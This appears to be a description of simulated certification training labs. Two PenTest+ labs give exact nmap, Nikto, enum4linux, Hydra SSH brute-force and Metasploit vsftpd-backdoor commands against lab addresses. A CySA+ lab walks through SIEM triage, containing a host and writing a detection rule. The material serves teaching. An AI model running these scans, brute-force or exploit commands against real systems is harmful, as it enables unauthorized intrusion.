Hands-on PenTest+ (2 labs) and CySA+ (1 lab) scenarios with real terminals, interactive GUIs, dashboards, and exact validation.
Detailed step-by-step instructions with tips, dynamic dashboards, exact validation, and safe reset.
Run a stealth SYN scan (-sS) with service version detection (-sV) and OS fingerprinting (-O) against the target /24 subnet. SYN scans are quieter than full TCP connect scans.
Type exactly:
nmap -sS -sV -O 10.10.14.0/24Run NSE vulnerability scripts against web ports 80/443. These scripts check for Heartbleed, ShellShock, and other CVEs.
Type exactly:
nmap --script vuln -p 80,443 10.10.14.22Use Nikto to scan for dangerous files, outdated software, and misconfigurations. Nikto checks 6700+ potentially dangerous files/programs.
Type exactly:
nikto -h http://10.10.14.22Use enum4linux to enumerate SMB shares, users, groups, and password policies. Misconfigured shares may allow anonymous access (null sessions).
Type exactly:
enum4linux -a 10.10.14.10Use Hydra to attempt SSH login with username "admin" against a password wordlist. Weak credentials are a top attack vector.
Type exactly:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.14.22 sshStart the Metasploit Framework console. Commands are case-sensitive.
Type exactly:
msfconsoleSearch for the vsftpd 2.3.4 backdoor exploit module (CVE-2011-2523). This backdoor opens a shell on port 6200.
Type exactly:
search type:exploit name:vsftpd_234_backdoorLoad the vsftpd backdoor exploit module. The prompt will change to show the active module.
Type exactly:
use exploit/unix/ftp/vsftpd_234_backdoorSet the RHOSTS option to specify the target IP address.
Type exactly:
set RHOSTS 10.10.14.22Launch the exploit against the target. Watch for "Session opened" message.
Type exactly:
runConnect to the shell session opened by the exploit. Sessions run in the background until you interact.
Type exactly:
sessions -i 1Check the current user identity. Root means full access; otherwise privilege escalation is needed.
Type exactly:
getuidBefore investigating alerts, review the raw authentication logs to understand the attack pattern.
Action: In the Alerts card, click View Logs on the High severity alert. Review the log entries showing failed login attempts.
Identify the attacker's IP and filter logs to see all activity from that source.
Action: In the Log Viewer modal, enter the suspicious IP (203.0.113.45) in the filter box and click Apply Filter.
The Medium alert shows encoded PowerShell execution. Review the PowerShell event logs to decode the command.
Action: Click View Logs on the Encoded PowerShell alert, then click Decode Base64 to reveal the actual command.
Build a timeline of events: failed logins (15:23) followed by PowerShell execution (15:27). This confirms successful compromise.
Action: Click Investigate on the High alert, then click Tag TP to mark as True Positive.
Review active network connections from WORKSTATION-07 to identify C2 traffic.
Action: Click Check Network in the Investigation modal. Note the suspicious outbound connection to 198.51.100.12:4444.
Isolate WORKSTATION-07 to prevent lateral movement and data exfiltration.
Action: Click Contain Host, confirm containment reason (C2 communication detected), then click Confirm Isolation.
Document the full incident with all indicators of compromise (IOCs).
Action: Click Create Ticket. Include: attacker IP (203.0.113.45), C2 server (198.51.100.12:4444), compromised account (admin), and decoded PowerShell command. Select Priority: High, Assign to SOC Tier 2.
Create a detection rule that correlates failed logins with subsequent PowerShell execution from the same host.
Action: Click Add Rule. Rule Name: "Brute-force followed by encoded PowerShell". Query: Match failed logins (>50) AND PowerShell within 10 minutes on same host. Severity: High, Notification: PagerDuty.
| Severity | Alert | Host | Time | Actions |
|---|---|---|---|---|
| High | Multiple Failed Logins | WORKSTATION-07 | 15:23 | |
| Medium | Encoded PowerShell | WORKSTATION-07 | 15:27 |
| Timestamp | Action | Details | Status |
|---|---|---|---|
| No activity yet | |||
Recon & enumeration finished.
Exploitation and session handling verified.
Full SIEM triage, log analysis, containment, and correlation rule creation completed.